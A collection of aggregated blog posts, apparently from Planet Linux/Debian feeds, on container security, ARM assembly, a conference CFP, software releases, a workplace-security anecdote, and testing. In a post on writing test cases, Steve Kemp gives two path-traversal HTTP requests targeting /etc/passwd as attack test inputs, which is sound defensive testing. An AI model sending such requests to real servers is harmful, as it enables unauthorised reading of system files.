Hypervisors present a smaller attack surface than containers. This is somewhat mitigated in containers by using seccomp, selinux and restricting capabilities in order to reduce the number of kernel entry points that untrusted code can touch, but even so there is simply a greater quantity of privileged code available to untrusted apps in a container environment when compared to a hypervisor environment[1].

Does this mean containers provide reduced security? That's an arguable point. In the event of a new kernel vulnerability, container-based deployments merely need to upgrade the kernel on the host and restart all the containers. Full VMs need to upgrade the kernel in each individual image, which takes longer and may be delayed due to the additional disruption. In the event of a flaw in some remotely accessible code running in your image, an attacker's ability to cause further damage may be restricted by the existing seccomp and capabilities configuration in a container. They may be able to escalate to a more privileged user in a full VM.

I'm not really compelled by either of these arguments. Both argue that the security of your container is improved, but in almost all cases exploiting these vulnerabilities would require that an attacker already be able to run arbitrary code in your container. Many container deployments are task-specific rather than running a full system, and in that case your attacker is already able to compromise pretty much everything within the container. The argument's stronger in the Virtual Private Server case, but there you're trading that off against losing some other security features - sure, you're deploying seccomp, but you can't use selinux inside your container, because the policy isn't per-namespace[2].

So that seems like kind of a wash - there's maybe marginal increases in practical security for certain kinds of deployment, and perhaps marginal decreases for others. We end up coming back to the attack surface, and it seems inevitable that that's always going to be larger in container environments. The question is, does it matter? If the larger attack surface still only results in one more vulnerability per thousand years, you probably don't care. The aim isn't to get containers to the same level of security as hypervisors, it's to get them close enough that the difference doesn't matter.

I don't think we're there yet. Searching the kernel for bugs triggered by Trinity shows plenty of cases where the kernel screws up from unprivileged input[3]. A sufficiently strong seccomp policy plus tight restrictions on the ability of a container to touch /proc, /sys and /dev helps a lot here, but it's not full coverage. The presentation I linked to at the top of this post suggests using the grsec patches - these will tend to mitigate several (but not all) kernel vulnerabilities, but there's tradeoffs in (a) ease of management (having to build your own kernels) and (b) performance (several of the grsec options reduce performance).

But this isn't intended as a complaint. Or, rather, it is, just not about security. I suspect containers can be made sufficiently secure that the attack surface size doesn't matter. But who's going to do that work? As mentioned, modern container deployment tools make use of a number of kernel security features. But there's been something of a dearth of contributions from the companies who sell container-based services. Meaningful work here would include things like:

  • Strong auditing and aggressive fuzzing of containers under realistic configurations
  • Support for meaningful nesting of Linux Security Modules in namespaces
  • Introspection of container state and (more difficult) the host OS itself in order to identify compromises

These aren't easy jobs, but they're important, and I'm hoping that the lack of obvious development in areas like this is merely a symptom of the youth of the technology rather than a lack of meaningful desire to make things better. But until things improve, it's going to be far too easy to write containers off as a "convenient, cheap, secure: choose two" tradeoff. That's not a winning strategy.

[1] Companies using hypervisors! Audit your qemu setup to ensure that you're not providing more emulated hardware than necessary to your guests. If you're using KVM, ensure that you're using sVirt (either selinux or apparmor backed) in order to restrict qemu's privileges.
[2] There's apparently some support for loading per-namespace Apparmor policies, but that means that the process is no longer confined by the sVirt policy
[3] To be fair, last time I ran Trinity under Docker under a VM, it ended up killing my host. Glass houses, etc.

comment count unavailable comments

Planet Linux AustraliaJonathan Adamczewski: Assembly Primer Part 7 — Working with Strings — ARM

These are my notes for where I can see ARM varying from IA32, as presented in the video Part 7 — Working with Strings.

I’ve not remotely attempted to implement anything approximating optimal string operations for this part — I’m just working my way through the examples and finding obvious mappings to the ARM arch (or, at least what seem to be obvious). When I do something particularly stupid, leave a comment and let me know :)

Working with Strings

        .asciz "Hello World of Assembly!"
        .asciz "H3110"

    .lcomm Destination, 100
    .lcomm DestinationUsingRep, 100
    .lcomm DestinationUsingStos, 100

Here’s the storage that the provided example StringBasics.s uses. No changes are required to compile this for ARM.

1. Simple copying using movsb, movsw, movsl

    @movl $HelloWorldString, %esi
    movw r0, #:lower16:HelloWorldString
    movt r0, #:upper16:HelloWorldString

    @movl $Destination, %edi
    movw r1, #:lower16:Destination
    movt r1, #:upper16:Destination

    ldrb r2, [r0], #1
    strb r2, [r1], #1

    ldrh r3, [r0], #2
    strh r3, [r1], #2

    ldr r4, [r0], #4
    str r4, [r1], #4

More visible complexity than IA32, but not too bad overall.

IA32′s movs instructions implicitly take their source and destination addresses from %esi and %edi, and increment/decrement both. Because of ARM’s load/store architecture, separate load and store instructions are required in each case, but there is support for indexing of these registers:

ARM addressing modes

According to ARM A8.5, memory access instructions commonly support three addressing modes:

  • Offset addressing — An offset is applied to an address from a base register and the result is used to perform the memory access. It’s the form of addressing I’ve used in previous parts and looks like [rN, offset]
  • Pre-indexed addressing — An offset is applied to an address from a base register, the result is used to perform the memory access and also written back into the base register. It looks like [rN, offset]!
  • Post-indexed addressing — An address is used as-is from a base register for memory access. The offset is applied and the result is stored back to the base register. It looks like [rN], offset and is what I’ve used in the example above.

2. Setting / Clearing the DF flag

ARM doesn’t have a DF flag (to the best of my understanding). It could perhaps be simulated through the use of two instructions and conditional execution to select the right direction. I’ll look further into conditional execution of instructions on ARM in a later post.

3. Using Rep

ARM also doesn’t appear to have an instruction quite like IA32′s rep instruction. A conditional branch and a decrement will be the long-form equivalent. As branches are part of a later section, I’ll skip them for now.

    @movl $HelloWorldString, %esi
    movw r0, #:lower16:HelloWorldString
    movt r0, #:upper16:HelloWorldString

    @movl $DestinationUsingRep, %edi
    movw r1, #:lower16:DestinationUsingRep
    movt r1, #:upper16:DestinationUsingRep

    @movl $25, %ecx # set the string length in ECX
    @cld # clear the DF
    @rep movsb

    ldm r0!, {r2,r3,r4,r5,r6,r7}
    ldrb r8, [r0,#0]
    stm r1!, {r2,r3,r4,r5,r6,r7}
    strb r8, [r1,#0]

To avoid conditional branches, I’ll start with the assumption that the string length is known (25 bytes). One approach would be using multiple load instructions, but the load multiple (ldm) instruction makes it somewhat easier for us — one instruction to fetch 24 bytes, and a load register byte (ldrb) for the last one. Using the ! after the source-address register indicates that it should be updated with the address of the next byte after those that have been read.

The storing of the data back to memory is done analogously. Store multiple (stm) writes 6 registers×4 bytes = 24 bytes (with the ! to have the destination address updated). The final byte is written using strb.

4. Loading string from memory into EAX register

    @leal HelloWorldString, %esi
    movw r0, #:lower16:HelloWorldString
    movt r0, #:upper16:HelloWorldString

    ldrb r1, [r0, #0]

    @movb $0, %al
    mov r1, #0

    @dec %esi  @ unneeded. equiv: sub r0, r0, #1
    ldrh r1, [r0, #0]

    @movw $0, %ax
    mov r1, #0

    @subl $2, %esi # Make ESI point back to the original string. unneeded. equiv: sub r0, r0, #2
    ldr r1, [r0, #0]

In this section, we are shown how the IA32 lodsb, lodsw and lodsl instructions work. Again, they have implicitly assigned register usage, which isn’t how ARM operates.

So, instead of a simple, no-operand instruction like lodsb, we have a ldrb r1, [r0, #0] loading a byte from the address in r0 into r1. Because I didn’t use post indexed addressing, there’s no need to dec or subl the address after the load. If I were to do so, it could look like this:

    ldrb r1, [r0], #1
    sub r0, r0, #1

    ldrh r1, [r0], #2
    sub r0, r0, #2

    ldr r1, [r0], #4

If you trace through it in gdb, look at how the value in r0 changes after each instruction.

5. Storing strings from EAX to memory

    @leal DestinationUsingStos, %edi
    movw r0, #:lower16:DestinationUsingStos
    movt r0, #:upper16:DestinationUsingStos

    strb r1, [r0], #1
    strh r1, [r0], #2
    str r1, [r0], #4

Same kind of thing as for the loads. Writes the letters in r1 (being “Hell” — leftovers from the previous section) into DestinationUsingStos (the result being “HHeHell”). String processing on little endian architectures has its appeal.

6. Comparing Strings

    @leal HelloWorldString, %esi
    movw r0, #:lower16:HelloWorldString
    movt r0, #:upper16:HelloWorldString
    @leal H3110, %edi
    movw r1, #:lower16:H3110
    movt r1, #:upper16:H3110

    ldrb r2, [r0,#0]
    ldrb r3, [r1,#0]
    cmp r2, r3

    @dec %esi
    @dec %edi
    @not needed because of the addressing mode used

    ldrh r2, [r0,#0]
    ldrh r3, [r1,#0]
    cmp r2, r3

    @subl $2, %esi
    @subl $2, %edi
    @not needed because of the addressing mode used
    ldr r2, [r0,#0]
    ldr r3, [r1,#0]
    cmp r2, r3

Where IA32′s cmps instructions implicitly load through the pointers in %edi and %esi, explicit loads are needed for ARM. The compare then works in pretty much the same way as for IA32, setting condition code flags in the current program status register (cpsr). If you run the above code, and check the status registers before and after execution of the cmp instructions, you’ll see the zero flag set and unset in the same way as is demonstrated in the video.

The condition code flags are:

  • bit 31 — negative (N)
  • bit 30 — zero (Z)
  • bit 29 — carry (C)
  • bit 28 — overflow (V)

There’s other flags in that register — all the details are on page B1-16 and B1-17 in the ARM Architecture Reference Manual.

And with that, I think we’ve made it (finally) to the end of this part for ARM.

Other assembly primer notes are linked here.

Kelvin ThomsonSchizophrenia About the Past and the Present

The right of politics can't work out whether we're better off now or better off in the past. The Prime Minister describes the Menzies era as a golden age of prosperity, saying "These years of low unemployment, low interest rates and strong social cohesion are the gold standard by which all governments will be judged". He describes this period as one of expanding Universities, the building of Canberra, and home ownership being brought within reach of most families.<o:p></o:p>

The Institute of Public Affairs, on the contrary, titled a recent report "Things are Getting Better All the Time", and claims that life has improved dramatically for Australians in terms of earnings and work and economic changes.
They should try and explain this to our young people, who are today caught in an Axis of Financial Evil – student debt, job insecurity, and housing unaffordability.<o:p></o:p>

We would be better placed to judge whether life is improving or not if we produced more accurate performance indicators than the deeply flawed and inadequate GDP, and adopted in Australia, as other countries and States of the USA have done, a Genuine Progress Indicator (GPI).<o:p></o:p>


Planet Linux AustraliaStewart Smith: CFP for Developer, Testing, Release and Continuous Integration Automation Miniconf at 2015

This is the Call for Papers for the Developer, Testing, Release and Continuous Integration Automation Miniconf at 2015 in Auckland.

This miniconf is all about improving the way we produce, collaborate, test and release software.

We want to cover tools and techniques to improve the way we work together to produce higher quality software:

– code review tools and techniques (e.g. gerrit)
– continuous integration tools (e.g. jenkins)
– CI techniques (e.g. gated trunk, zuul)
– testing tools and techniques (e.g. subunit, fuzz testing tools)
– release tools and techniques: daily builds, interacting with distributions, ensuring you test the software that you ship.
– applying CI in your workplace/project

We’re looking for talks about technology *and* the human side of this

Speakers at this miniconf can get a miniconf only pass, but to attend the main conference, you’ll need to organize that yourself.

There will be a projector, and there is a possibility the talk will be recorded (depending on if the conference A/V is up and running) – if recorded, talks will be posted with the same place with the same CC license as main LCA talks are.

CFP is open until midnight November 21st 2015.

Planet Linux AustraliaAndrew Pollock: [life] Day 266: Prep play date, shopping and a play date

Zoe's sleep seems a bit messed up lately. She yelled out for me at 3:53am, and I resettled her, but she wound up in bed with me at 4:15am anyway. It took me a while to get back to sleep, maybe around 5am, but then we slept in until about 7:30am.

That made for a bit of a mad rush to get out the door to Zoe's primary school for her "Prep Play Date" orientation. We managed to make it out the door by a bit after 8:30am.

15 minutes is what it appears to take to scooter to school, which is okay. With local traffic being what it is, I think this will be a nice way to get to and from school next year, weather permitting.

We signed in, and Zoe got paired up with an existing (extremely tall) Prep student to be her buddy. The other girl was very keen to hold Zoe's hand, which Zoe was a bit dubious about at first, but they got there eventually.

The kids spent about 20 minutes rotating through the three classrooms, with a different buddy in each classroom. They were all given a 9 station name badge when they signed in, and they got a sticker for each station that they visited in each classroom.

It was a really nice morning, and I discovered there's one other girl from Zoe's Kindergarten going to her school, so I made a point of introducing myself to her mother.

I've got a really great vibe about the school, and Zoe enjoyed the morning. I'm looking forward to the next stage of her education.

We scootered home afterwards, and Zoe got the speed wobbles going down the hill and had a spectacular crash, luckily without any injuries thanks to all of her safety gear.

Once we got home, we headed out to the food wholesaler at West End to pick up a few bits and pieces, and then I had to get to Kindergarten to chair the monthly PAG meeting. I dropped Zoe at Megan's place for a play date while I was at the Kindergarten.

After the meeting, I picked up Zoe and we headed over to Westfield Carindale to buy a birthday present for Zoe's Kindergarten friend, Ivy, who is having a birthday party on Saturday.

We got home from Carindale with just enough time to spare before Sarah arrived to pick Zoe up.

I then headed over to Anshu's place for a Diwali dinner.

Planet DebianSylvain Le Gall: Release of OASIS 0.4.5

On behalf of Jacques-Pascal Deplaix

I am happy to announce the release of OASIS v0.4.5.

Logo OASIS small

OASIS is a tool to help OCaml developers to integrate configure, build and install systems in their projects. It should help to create standard entry points in the source code build system, allowing external tools to analyse projects easily.

This tool is freely inspired by Cabal which is the same kind of tool for Haskell.

You can find the new release here and the changelog here. More information about OASIS in general on the OASIS website.

Here is a quick summary of the important changes:

  • Build and install annotation files.
  • Use builtin bin_annot and annot tags.
  • Tag .mly files on the same basis as .ml and .mli files (required by menhir).
  • Remove 'program' constraint from C-dependencies. Currently, when a library has C-sources and e.g. an executable depends on that library, then changing the C-sources and running '-build' does not yield a rebuild of the library. By adding these dependencies (rather removing the constraint), it seems to work fine.
  • Some bug fixes


  • no_automatic_syntax (alpha): Disable the automatic inclusion of -syntax camlp4o for packages that matches the internal heuristic (if a dependency ends with a .syntax or is a well known syntax).
  • compiled_setup_ml (alpha): Fix a bug using multiple arguments to the configure script.

This new version is a small release to catch up with all the fixes/pull requests present in the VCS that have not yet been published. This should made the life of my dear contributors easier -- thanks again for being patient.

I would like to thanks again the contributor for this release: Christopher Zimmermann, Jerome Vouillon, Tomohiro Matsuyama and Christoph Höger. Their help is greatly appreciated.

Planet Linux News: Speaker Feature: Audrey Lobo-Pulo, Jack Moffitt

Audrey Lobo-Pulo

Audrey Lobo-Pulo

Evaluating government policies using open source models

10:40am Wednesday 14th January 2015

Dr. Audrey Lobo-Pulo is a passionate advocate of open government and the use of open source software in government modelling. Having started out as a physicist developing theoretical models in the field of high speed data transmission, she moved into the economic policy modelling sphere and worked at the Australian Treasury from 2005 till 2011.

Currently working at the Australian Taxation Office in Sydney, Audrey enjoys discussions on modelling economic policy.

For more information on Audrey and her presentation, see here. You can follow her as @AudreyMatty and don’t forget to mention #LCA2015.

Jack Moffitt

Jack Moffitt

Servo: Building a Parallel Browser

10:40am Friday 16th January 2015

Jacks current project is called Chesspark and is an online community for chess players built on top of technologies like XMPP (aka Jabber), AJAX, and Python.

He previously created the Icecast Streaming Media Server, spent a lot of time developing and managing the Ogg Vorbits project, and helping create and run the Foundation. All these efforts exist to create a common, royalty free, and open standard for multimedia on the Internet.

Jack is also passionate about Free Software and Open Source, technology, music, and photography.

For more information on Jack and his presentation, see here. You can follow him as @metajack and don’t forget to mention #LCA2015.

LongNowWorld War II Sites, Then and Now


About two years ago, we shared with you a set of enhanced photographs that visualized the transformation of World-War-II-era Leningrad into contemporary St. Petersburg.

We recently came across a similar photographic experiment in picturing historical change. The temporal lapse is similar: this interactive series compares 1940s images of European sites that played an important role in World War II history with their contemporary counterparts. There is no stitching together of old with new in these images; instead, your mouse performs the magic of time travel, revealing the new in place of the old as you drag it to the right.

Nevertheless, these photos have the same effect of making visible, even tangible, the radical transformations that a locale can undergo in the fleeting span of a half century – while simultaneously highlighting the endurance of its sense of place.


Planet DebianPetter Reinholdtsen: listadmin, the quick way to moderate mailman lists - nice free software

If you ever had to moderate a mailman list, like the ones on, you know the web interface is fairly slow to operate. First you visit one web page, enter the moderation password and get a new page shown with a list of all the messages to moderate and various options for each email address. This take a while for every list you moderate, and you need to do it regularly to do a good job as a list moderator. But there is a quick alternative, the listadmin program. It allow you to check lists for new messages to moderate in a fraction of a second. Here is a test run on two lists I recently took over:

% time listadmin xiph
fetching data for ... nothing in queue
fetching data for ... nothing in queue

real    0m1.709s
user    0m0.232s
sys     0m0.012s

In 1.7 seconds I had checked two mailing lists and confirmed that there are no message in the moderation queue. Every morning I currently moderate 68 mailman lists, and it normally take around two minutes. When I took over the two pkg-xiph lists above a few days ago, there were 400 emails waiting in the moderator queue. It took me less than 15 minutes to process them all using the listadmin program.

If you install the listadmin package from Debian and create a file ~/.listadmin.ini with content like this, the moderation task is a breeze:
spamlevel 23
default discard
discard_if_reason "Posting restricted to members only. Remove us from your mail list."

password secret
adminurl https://{domain}/mailman/admindb/{list}

password hidden

There are other options to set as well. Check the manual page to learn the details.

If you are forced to moderate lists on a mailman installation where the SSL certificate is self signed or not properly signed by a generally accepted signing authority, you can set a environment variable when calling listadmin to disable SSL verification:


If you want to moderate a subset of the lists you take care of, you can provide an argument to the listadmin script like I do in the initial screen dump (the xiph argument). Using an argument, only lists matching the argument string will be processed. This make it quick to accept messages if you notice the moderation request in your email.

Without the listadmin program, I would never be the moderator of 68 mailing lists, as I simply do not have time to spend on that if the process was any slower. The listadmin program have saved me hours of time I could spend elsewhere over the years. It truly is nice free software.

As usual, if you use Bitcoin and want to show your support of my activities, please send Bitcoin donations to my address 15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.

Google AdsenseShare your thoughts on AdSense, AdMob and other Google publisher solutions

Your thoughts and suggestions play a key role in shaping our publisher offerings. That’s why we’re looking forward to hearing from you in our semi-annual publisher survey launching on November 4th. Make your voice heard by sharing your thoughts, and help us provide you a more useful and impactful publisher experience.

The feedback collected from this survey is closely reviewed to help determine our product roadmap. Thanks to your suggestions last time round, we’ve launched a number of new features to grow your earnings and improve our service. On AdSense these include improved performance with magazine ads, enhanced control filters in the AdSense Ad review center and the launch of wire transfer as a convenient payment method in more countries. You also now have access to additional insights with the integration of Google Analytics into the new AdMob.

Over the coming weeks, you may receive a survey by email. To take part, please take the following steps as soon as possible:

  • Update your contact details.
  • Update your email preferences to receive ‘occasional survey’ messages.

Whether you’ve completed this survey before or you’re providing feedback for the first time, we’d like to thank you for taking the time to tell us how we’re doing. We’re looking forward to hearing your feedback.

Posted by Adriana Satmarean - AdSense Publisher Happiness Team

Sociological ImagesWhat’s for Breakfast?

One of my favorite examples of social construction is that we eat hot links for breakfast and pork chops for dinner. Both pig, but morning sausage seems odd in the evening and pork chops for breakfast would be a decidedly deviant sunrise treat.

A pretty set of photos at The New York Times illustrates this social construction of breakfast food by highlighting the first meal of the day for children in seven parts of the world. It would be fun — for those of you teaching classes — to show some of them to students and ask them to guess (1) the meal of the day and (2) the age of the eater.

Chitedza, Malawi: cornmeal porridge with soy and groundnut flour; deep-fried cornmeal fritters with onions, garlic and chiles; boiled sweet potato and pumpkin; juice of dried hibiscus and sugar.


São Paulo, Brazil: ham and cheese, bread with butter, coffee.


Tokyo, Japan: stir-fried green peppers with dried fish, soy sauce, and sesame seeds; raw egg and soy sauce poured over rice; lotus root, burdock root, and carrot sautéed with a rice wine; miso soup; fruit; milk.


Istanbul, Turkey: bread, Nutella, strawberry jam, honey butter; olives; sliced tomato; hard-boiled egg; goat and cow cheeses.


More at The Times.

See also our Social Construction of Flavor Pinterest board. Lots of neat stuff there!

Lisa Wade is a professor of sociology at Occidental College and the co-author of Gender: Ideas, Interactions, Institutions. You can follow her on Twitter and Facebook.

(View original at

Krebs on SecurityGoogle Accounts Now Support Security Keys

People who use Gmail and other Google services now have an extra layer of security available when logging into Google accounts. The company today incorporated into these services the open Universal 2nd Factor (U2F) standard, a physical USB-based second factor sign-in component that only works after verifying the login site is truly a Google site.

A $17 U2F device made by Yubikey.

A $17 U2F device made by Yubico.

The U2F standard (PDF) is a product of the FIDO (Fast IDentity Online) Alliance, an industry consortium that’s been working to come up with specifications that support a range of more robust authentication technologies, including biometric identifiers and USB security tokens.

The approach announced by Google today essentially offers a more secure way of using the company’s 2-step authentication process. For several years, Google has offered an approach that it calls “2-step verification,” which sends a one-time pass code to the user’s mobile or land line phone.

2-step verification makes it so that even if thieves manage to steal your password, they still need access to your mobile or land line phone if they’re trying to log in with your credentials from a device that Google has not previously seen associated with your account. As Google notes in a support document, security key “offers better protection against this kind of attack, because it uses cryptography instead of verification codes and automatically works only with the website it’s supposed to work with.”

Unlike a one-time token approach, the security key does not rely on mobile phones (so no batteries needed), but the downside is that it doesn’t work for mobile-only users because it requires a USB port. Also, the security key doesn’t work for Google properties on anything other than Chrome.

The move comes a day after Apple launched its Apple Pay platform, a wireless payment system that takes advantage of the near-field communication (NFC) technology built into the new iPhone 6, which allows users to pay for stuff at participating merchants merely by tapping the phone on the store’s payment terminal.

I find it remarkable that Google, Apple and other major tech companies continue to offer more secure and robust authentication options than are currently available to consumers by their financial institutions. I, for one, will be glad to see Apple, Google or any other legitimate player give the entire mag-stripe based payment infrastructure a run for its money. They could hardly do worse.

Soon enough, government Web sites may also offer consumers more authentication options than many financial sites.  An Executive Order announced last Friday by The White House requires the National Security Council Staff, the Office of Science and Technology Policy and the Office of Management and Budget (OMB) to submit a plan to ensure that all agencies making personal data accessible to citizens through digital applications implement multiple layers of identity assurance, including multi-factor authentication. Verizon Enterprise has a good post with additional details of this announcement.

RacialiciousRe-Re-Birth Of The Cool: Static Shock Gets A Shocking Online Revival

By Arturo R. García

<iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="" width="560"></iframe>

Well now this is interesting.

As Variety reported on Tuesday, the demand for a new Static Shock revival will finally be met, in perhaps the most unexpected of fashions: an online-only live-action series.

It’s also encouraging to see the revival of Milestone Entertainment’s signature character is being led by Milestone alumni: Film and comics veteran Reginald Hudlin will be the executive producer, in collaboration with Denys Cowan, who produced the much-missed animated series that Warner Brothers stubbornly left by the wayside years ago.

Cover to first Static Shock TPB, “Rebirth Of The Cool,” from Milestone Entertainment.

Pushing Static into the digital realm through its new Blue Ribbon Content imprint could help DC Entertainment in its bid to keep up with archrivals Marvel in that arena; the comics division has won popular and commercial praise for offering Smallville, Batman ’66 and the upcoming Wonder Woman ’77 as online exclusives.

The upside might be more than even DC anticipates: Static now has the benefit of returning to television after literally years of fans and critics (including this site) denouncing the company for letting him languish in the name of feeding executives’ apparent love for Silver Age white heroes.

This new incarnation is also arriving at a moment when the Black audience is growing online; according to Interactive One, that audience has grown by 30 percent since 2011 to an estimated 23 million viewers. Comparatively, the white online audience has only grown by 8 percent during the same span.

But as is the case with Cyborg, DC must now consider how to take advantage of Static’s new presence in its comics. Currently, the character is supposed to be featured in upcoming issues of Teen Titans. But it’s going to be hard for longtime fans to forgive how badly the company botched its relaunch as part of the New 52 era, in a short-lived run that “featured” original writer John Rozum, another Milestone alumnus, essentially get turfed out:

From the first issue on, I was essentially benched by Harvey Richards and artist/writer Scott McDaniel. All of my ideas and suggestions were met with disdain, and Scott McDaniel lectured me on how my method for writing was wrong because it wasn’t what the Robert McKee screenwriting book he read told him was the way to do things. The man who’d never written anything was suddenly more expert than me and the editor was agreeing with him. Scott had also never read a Static comic book, nor seen the cartoon series, yet was telling me that my dialogue didn’t sound true to the character and would “fix it.”

There was more concern about seeing that the title sold and didn’t get cancelled than there was in telling good stories and having something coherent to bring readers in. This is what led Harvey to insist on the stuff with the two Sharon’s and cutting off Static’s arm. He had no answers for how to resolve these things, but thought it would keep reader’s wowed enough to stick with the series. This, too, was frustrating. It was a lot of grasping at straws and trying to second guess what would keep it selling. It was decided that “bigger action” on every page of every issue was the key.

Static’s alter ego, Virgil, who was more important to the original series than his super hero persona, was put on the very back burner because Harvey said it wasn’t important and that the book just needed to be all action. One of my scripts was deemed too slow because there were a total of 4 pages where no one was hitting or shooting anything.

There’s little reason to believe that Cowan and Hudlin won’t want to avoid this kind of creative debacle. Nor should we doubt that they’ve considered the tremendous upside Static stands to give DC. The big question, as always, is whether a company that complained nobody would buy his action figures is willing to let them develop and deliver on that promise.

The post Re-Re-Birth Of The Cool: Static Shock Gets A Shocking Online Revival appeared first on Racialicious - the intersection of race and pop culture.

Planet DebianKonstantinos Margaritis: Eigen NEON port extended to ARMv8!

Soon after the VSX port, and as promised I have completed the ARMv8 NEON (a.k.a. Advanced SIMD) port. Basically this extends support to 64-bit doubles and also provides faster alternatives to division as ARMv8 has builtin instructions for division both for 32-bit floats and 64-bit doubles. Preliminary benchmarks (bench_gemm):

Worse Than FailureSecurity through Idiocy

The ticket Bruce found in his help desk queue seemed innocuous enough on the surface. A user in the Finance department complained about not being able to create a file named “Wire Transfer” in their network folder. Being in finance, they did this many times in the past, but suddenly it no longer worked. Bruce assumed the user was doing something wrong, and that it would be resolved in five minutes.

Bruce navigated to the Finance network share, and attempted to create a new file named WireTransfer.txt. A big, ugly “ACCESS DENIED: Security Policy Violation!” message box stared back at him. “That’s odd…” Bruce muttered, knowing he had write access to the directory. “I’ll bet Duane had something to do with this…”

Duane was the resident security “expert”, which always made him Public Enemy #1. He was a kooky old-timer, with a short temper and a low tolerance for human interaction. Duane spent most of his time researching everything but the threats their systems were likely to face. Bruce slinked up to Duane’s office, took a deep breath, and said, “Hey, Duane, I got a ticket for…”

Duane held up a hand to silence him, and continued staring at his screen. “I’m reading the FBI cyber-security threat assessments for the week. This is more important than your helpdesk crap.”

“Well, this is a critical issue, Duane. Finance needs to make this multi-million dollar wire transfer…”

“Hey!” Duane interjected. “I’ve been thinking that one of our janitors looks suspiciously like D.B. Cooper.” He pointed at the “America’s Most Wanted” printout on the wall. “If you see him, or anyone else on this poster, let me know immediately! These criminal types can be anywhere. Even you could be one!”

“Uh huh… sure. Listen, is there any strange reason why no one can create a file named ‘Wire Transfer’? They need to do that to process wire transfers.”

Duane rolled his eyes and threw his bald head back. “Ohhh, no. No. That is strictly forbidden. I’m not cleaning up after another wire transfer virus again!” Duane explained that a month ago, a dozen employees received an email with a zip file named It claimed to be from “YOUR BANK HERE”, and said to open the attachment to claim the spoils of a “bank error in youre[sic] favour!” Despite Duane’s constant warnings about suspicious attachments, several users opened the file and infected their computers.

“You see, Bruce, I deal with these attacks every day! This is my life. I flexed my security muscles and I took care of the problem. The network won’t allow anything with the words ‘wire’ and ‘transfer’ in the name. That virus will never get through here again! Now, toddle back to your little help-desk station, and explain to our users, in small words, that they need to figure out another way to do transfers.” Duane waited a beat, and when Bruce didn’t vanish as quickly as he wanted. “You need to leave my office. I have to go traverse the building perimeter to look for physical vulnerabilities!” Duane leapt out of the chair, pushing Bruce ahead of him, while leaving his workstation unlocked.

Back in his own cube, Bruce contacted the user to see if they could name the file something different. Unfortunately, the inflexible, in-house application they used to process transfers only accepted files with names styled WireTransfer20141023. Bruce resigned himself to a bleak future, where he escalated this to his manager, who then escalated to the finance manager, who would then go above Duane’s head to the IT director, who would then force Duane to remove this “fix”. Duane would then catch wind of Bruce’s betrayal and vengefully pull some strings in the security community to get Bruce’s mug added to that “America’s Most Wanted” poster, right next to D. B. Cooper.

Planet DebianSteve Kemp: On writing test-cases and testsuites.

Last night I mostly patched my local copy of less to build and link against the PCRE regular expression library.

I've wanted to do that for a while, and reading Raymond Chen's blog post last night made me try it out.

The patch was small and pretty neat, and I'm familiar with GNU less having patched it in the past. But it doesn't contain tests.

Test cases are hard. Many programs, such as less, are used interactively which makes writing a scaffold hard. Other programs suffer from a similar fate - I'm not sure how you'd even test a web browser such as Firefox these days - mangleme would catch some things, eventually, but the interactive stuff? No clue.

In the past MySQL had a free set of test cases, but my memory is that Oracle locked them up. SQLite is famous for its decent test coverage. But off the top of my head I can't think of other things.

As a topical example there don't seem to be decent test-cases for either bash or openssl. If it compiles it works, more or less.

I did start writing some HTTP-server test cases a while back, but that was just to automate security attacks. e.g. Firing requests like:

GET /../../../etc/passwd HTTP/1.0
GET //....//....//....//etc/passwd HTTP/1.0

(It's amazing how many toy HTTP server components included in projects and products don't have decent HTTP-servers.)

I could imagine that being vaguely useful, especially because it is testing the protocol-handling rather than a project-specific codebase.

Anyway, I'm thinking writing test cases for things is good, but struggling to think of a decent place to start. The project has to be:

  • Non-interactive.
  • Open source.
  • Widely used - to make it a useful contribution.
  • Not written in some fancy language.
  • Open to receiving submissions.

Comments welcome; but better yet why not think about the test-coverage of any of your own packages and projects...?

Planet DebianRuss Allbery: Another haul post

I know I've been very quiet here lately. That's due to a variety of reasons, but mostly because settling in to a new job is taking nearly all of my attention and time. When that's combined with getting obsessed with watching the League of Legends world championships, it means no real time for writing things.

I've had lots of time for reading things, though, and have a lot of book reviews that I need to write. So, of course, I felt like buying more books.

Elizabeth Bear — One-Eyed Jack (sff)
Steven Brust — Hawk (sff)
Kenneth T. Jackson — Crabgrass Frontier (non-fiction)
Ann Leckie — Ancillary Sword (sff)
Scott Lynch — Republic of Thieves (sff)
Randall Munroe — What If? (non-fiction)
Sarah Tolmie — The Stone Boatmen (sff)
Jeffrey Toobin — The Oath (non-fiction)

I'm pretty excited about everything in this shipment, but particularly the new Vlad Taltos novel from Brust and the sequel to Ancillary Justice (probably the best novel that I've read so far this year). And of course there's What If?.

Worse Than FailureAnnouncements: Tokyo Meet-up & Site Fixes

Tokyo readers -- I am once again visiting your fine city this week, and thought it'd be fun to try for another Tokyo/TDWTF meetup. Earlier this year, we got together at an izakaya for nomihoudai:

If you're unaware, nomihoudai is an easy way for a group of folks to get as much food and drink from the menu as they'd like for a set price over a set duration, without fussing over details like who ordered what and how many. While Japanese people often see this as a convenient offer, as an American I recognize it for the challenge it is -- and conquer it I shall!

So, if you're up for getting together this Friday (possibly Saturday?) in Shinjuku or Shibuya area, please drop me a note via the contact form or direct, apapadimoulis/

As for everyone else, thanks for submitting the bugs/issues/suggestions for the new site. We just fixed a bunch of them earlier today, and will continue to fix stuff as it comes in. Your help is greatly appreciated -- not just for submitting issues but for helping with fixed teh codez as well. If you're brave enough to explore the TDWTF codebase, I'll gladly send you some brand new TDWTF stickers with the updated logo.

Planet DebianJunichi Uekawa: Migrating my diary system to some new server.

Migrating my diary system to some new server. I took the chance to migrate my system from CVS-based system to Git-based system. It no longer relies on a chain of CVS commit hooks, and now I have a makefile to publish. I also took the chance to rewrite my 15 year old elisp so that I can use UTF-8 instead of a mix of ISO-2022-JP and EUC-JP. Dusting off some old code. No test exists, what could go wrong!

Geek FeminismFish Are Friends, Not Linkspam (21 October 2014)


  • On Gamergate: a letter from the editor | Polygon (October 17): “Video games are capital “C” Culture now. There won’t be less attention, only more. There won’t be less scrutiny. There certainly won’t be less diversity, in the fiction of games themselves or in the demographics of their players. What we’re in control of is how we respond to that expansion, as journalists, as developers, as consumers. Step one has to be a complete rejection of the tools of harassment and fear — we can’t even begin to talk about the interesting stuff while people are literally scared for their lives. There can be no dialogue with a leaderless organization that both condemns and condones this behavior, depending on who’s using the hashtag.”
